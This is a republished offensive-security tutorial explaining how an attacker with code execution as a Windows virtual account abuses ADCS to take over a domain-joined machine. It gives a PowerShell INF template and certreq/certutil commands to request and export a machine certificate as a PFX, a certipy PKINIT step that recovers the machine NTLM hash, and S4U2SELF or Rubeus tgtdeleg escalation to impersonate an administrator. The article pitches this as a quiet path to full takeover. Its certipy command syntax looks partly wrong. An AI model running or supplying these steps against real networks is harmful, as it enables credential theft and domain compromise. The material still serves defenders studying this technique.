Uncharted ADCS Virtual Account Attack: Hijack Domain Machines End‑to‑End
The article demonstrates how, with remote code execution as a Windows virtual account, an attacker can abuse ADCS to request a machine certificate, export it as a PFX, extract the machine's NTLM hash via PKINIT, and then use S4U2SELF (or a TGTDeleg path) to fully compromise a domain‑joined host without installing extra tools.
TL;DR
When you obtain code execution in the context of a Microsoft virtual/service account, you can request a machine certificate from ADCS without any additional privileges, export it, use PKINIT to recover the machine account's NTLM hash, and then leverage S4U2SELF to elevate privileges on the host.
What is a Virtual Account?
Virtual accounts are Windows‑provided service identities that do not require separate domain or local user objects. They are managed by the local Security Account Manager (SAM) and commonly appear as NT SERVICE\Network Service or IIS APPPOOL\DefaultAppPool. By default they hold SeImpersonatePrivilege, allowing them to impersonate other users.
When a virtual account accesses domain resources, it authenticates using the computer account ( DOMAIN\COMPUTER$) credentials, meaning any request for SMB shares, TGT/TGS tickets, or certificates is performed as the host machine.
Prerequisites
Remote code execution as a virtual account
ADCS (Active Directory Certificate Services) present in the target environment
A certificate template that permits domain‑computer enrollment and includes the Client Authentication EKU
Network connectivity to the CA server and the domain controller/KDC
Starting Point
The authors used PsExec to spawn a shell as NT SERVICE\Network Service after obtaining the MSSQL SA credentials. This virtual account context is the basis for the rest of the attack.
Creating the INF File
An INF file defines the certificate request parameters. The key settings are:
$infContent = @"
[NewRequest]
Subject = "CN=$env:COMPUTERNAME"
KeySpec = 1
KeyLength = 2048
Exportable = TRUE
MachineKeySet = FALSE
SMIME = FALSE
PrivateKeyArchive = FALSE
UserProtected = FALSE
UseExistingKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0
[EnhancedKeyUsageExtension]
OID=1.3.6.1.5.5.7.3.2 ; Client Authentication
"@
$infContent | Out-File -FilePath "C:\Windows\Tasks\cert.inf"Setting MachineKeySet = FALSE ensures the private key is not tied to the local computer account, allowing export without additional privileges.
Submitting the Request
Convert the INF to a certificate request and submit it to the CA using the built‑in certreq tool:
certreq -new "C:\Windows\Tasks\cert.inf" "C:\Windows\Tasks\cert.req"
certreq -submit -config "CA-SERVER\CA-NAME" -attrib "CertificateTemplate:Machine" "C:\Windows\Tasks\cert.req" "C:\Windows\Tasks\cert.cer"Exporting the Certificate as PFX
After the CA issues the certificate, export it to a PFX file (protected with a password) so it can be used with PKINIT:
$thumb = (certreq -accept -user -f "C:\Windows\Tasks\cert.cer" 2>&1 | Out-String | Select-String -Pattern '[0-9A-Fa-f]{40}' -AllMatches).Matches[0].Value;
certutil -user -exportPFX -p "pass" $thumb "C:\Windows\Tasks\cert.pfx"Extracting the Machine NTLM Hash
Transfer the PFX to a workstation with certipy installed and run:
certipy auth /cert C:\Windows\Tasks\cert.pfx /password passThis uses PKINIT to authenticate to the KDC with the certificate and returns the machine account's NTLM hash.
Privilege Escalation via S4U2SELF
With the NTLM hash, the attacker can invoke the Kerberos extension S4U2SELF to request a service ticket as any user (e.g., wscb02\Administrator) without needing to execute payloads on the host, achieving full domain‑level compromise.
No ADCS? Use TGTDeleg
If ADCS is unavailable, the same end goal can be reached by using the tgtdeleg technique in Rubeus. When a virtual account requests a TGT for delegation, the KDC issues a machine‑account TGT, which can then be leveraged with S4U2SELF in the same way.
Conclusion
The traditional “Potato” privilege‑escalation path is not the only—or even the preferred—method when a virtual account is present. abusing ADCS to obtain a machine certificate or using TGTDeleg + S4U2SELF provides a quieter, tool‑free route to full machine takeover and domain credential theft.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
